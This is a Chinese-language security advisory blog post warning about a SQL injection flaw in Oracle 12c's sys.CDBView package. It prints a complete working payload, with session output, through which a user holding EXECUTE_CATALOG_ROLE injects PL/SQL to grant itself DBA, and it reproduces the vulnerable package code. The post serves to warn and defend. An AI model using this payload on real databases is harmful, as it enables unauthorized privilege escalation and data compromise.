588
【安全警告】Oracle 12c 多租戶的SQL注入高危風險防範
用Oracle多租戶選件時,由於Container容器和PDB融合共存,則權限控製必將更加重要,在之前的文章中我們提到,Oracle 12.2 的 lockdown profile就是為了實現PDB中更為全麵的權限控製。
我們在2016年『比特幣事件』中,總結了:數據安全的十六大軍規,其中有一條也明確提到最小權限守則,而且要真正實現權限管理。
SQL注入攻擊的風險
我們來看看如果權限控製不當,可能遭遇到的數據庫安全風險。根據最近披露的風險之一,通過SQL注入可能影響數據庫的安全,以下問題影響到多租戶的12.1.0.2.0最新版本。
假如我們在CDB中擁有一個普通用戶,因為某種原因它申請和被授予了EXECUTE_CATALOG_ROLE的角色:
SQL> connect / as sysdba
Connected.
SQL> create user c##eygle identified by eygle;
User created.
SQL> grant execute_catalog_role,create session to c##eygle;
Grant succeeded.
SQL> select granted_role from user_role_privs;
GRANTED_ROLE
---------------------------------------------
EXECUTE_CATALOG_ROLE
我們看看這一角色可能由此深入所做出的嚐試,經常討論的SQL注入也就在這個知識範疇之中。
當以下一個係列的SQL被執行之後,一個普通用戶獲得了DBA的權限,如果這是在一個多租戶的環境中,這個提權將是非常危險的:
SQL> connect c##eygle/eygle
Connected.
SQL> select granted_role from user_role_privs;
GRANTED_ROLE
-----------------------------------------------------
EXECUTE_CATALOG_ROLE
SQL> exec sys.CDBView.create_cdbview(true,'ALL_POLICIES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','yh_view' ,' */ execute immediate ''grant dba to c##eygle''; RETURN ''1'';END; SELECT f as x FROM dual)-- ');
*
ERROR at line 1:
ORA-00905: missing keyword
ORA-06512: at "SYS.CDBVIEW", line 58
ORA-06512: at line 1
SQL> select /*+WITH_PLSQL*/ * from ALL_POLICIES;
X
-------
1
SQL> select granted_role from user_role_privs;
GRANTED_ROLE
----------------------------
DBA
EXECUTE_CATALOG_ROLE
SQL> select banner from v$version;
BANNER
----------------------------------------------------------------------------------------
Oracle Database 12c Enterprise Edition Release 12.1.0.2.0 - 64bit Production
PL/SQL Release 12.1.0.2.0 - Production
CORE 12.1.0.2.0 Production
TNS for Linux: Version 12.1.0.2.0 - Production
NLSRTL Version 12.1.0.2.0 - Production
當然作為資深的DBA來說,我們應當知道EXECUTE_CATALOG_ROLE這一角色權限是非常危險的,要嚴格控製這一權限的授予。這一注入,實際上是利用了 CDBView 包的校驗漏洞,進行了注入提權。
包 sys.CDBView 的主要內容如下(在安裝腳本中是明文的),風險來自於腳本內部的校驗缺失:
create or replace package sys.CDBView as
----------------------------
-- PROCEDURES AND FUNCTIONS
--
procedure create_cdbview(chk_upgrd IN boolean, owner IN varchar2,
oldview_name IN varchar2, newview_name IN varchar2);
end CDBView;
/
grant execute on sys.CDBView to execute_catalog_role
/
create or replace package body sys.CDBView is
-- Create the cdb view
-- private helper procedure to create the cdb view
-- Note that quotes should not be added around owner, oldview_name and
-- newview_name before create_cdbview is invoked since all three are used
-- as literals to query dictionary views.
procedure create_cdbview(chk_upgrd IN boolean, owner IN varchar2,
oldview_name IN varchar2, newview_name IN varchar2) as
sqlstmt varchar2(4000);
col_name varchar2(128);
comments varchar2(4000);
col_type number;
upper_owner varchar2(128);
upper_oldview varchar2(128);
quoted_owner varchar2(130); -- 2 more than size of owner
quoted_oldview varchar2(130); -- 2 more than size of oldview_name
quoted_newview varchar2(130); -- 2 more than size of newview_name
cursor tblcommentscur is select c.comment$
from sys.obj$ o, sys.user$ u, sys.com$ c
where o.name = upper_oldview and u.name = upper_owner
and o.obj# = c.obj# and o.owner#=u.user# and o.type# = 4
and c.col# is null;
cursor colcommentscur is select c.name, co.comment$, c.type#
from sys.obj$ o, sys.col$ c, sys.user$ u, sys.com$ co
where o.name = upper_oldview and u.name = upper_owner
and o.owner# = u.user# and o.type# = 4 and o.obj# = c.obj#
and c.obj# = co.obj# and c.intcol# = co.col#
and bitand(c.property, 32) = 0;
begin
-- convert owner and view names to upper case
upper_owner := upper(owner);
upper_oldview := upper(oldview_name);
quoted_owner := '"' || upper_owner || '"';
quoted_oldview := '"' || upper_oldview || '"';
quoted_newview := '"' || upper(newview_name) || '"';
-- create cdb view
sqlstmt := 'CREATE OR REPLACE VIEW ' ||
quoted_owner || '.' || quoted_newview ||
' CONTAINER_DATA AS SELECT * FROM CONTAINERS(' ||
quoted_owner || '.' || quoted_oldview || ')';
--dbms_output.put_line(sqlstmt);
execute immediate sqlstmt;
......
end if;
end loop;
close colcommentscur;
end;
end CDBView;
/
show errors;
/
安全風險無處不在,提高安全意識刻不容緩。
在雲和恩墨的Bethune自動化巡檢平台上,我們已經向著用戶發出這一警示,強烈推薦大家通過Bethune ( https://bethune.enmotech.com )平台檢測數據庫的安全風險及性能狀況,目前該平台完全免費:
文章轉自數據和雲公眾號,原文鏈接
最後更新:2017-07-18 11:04:04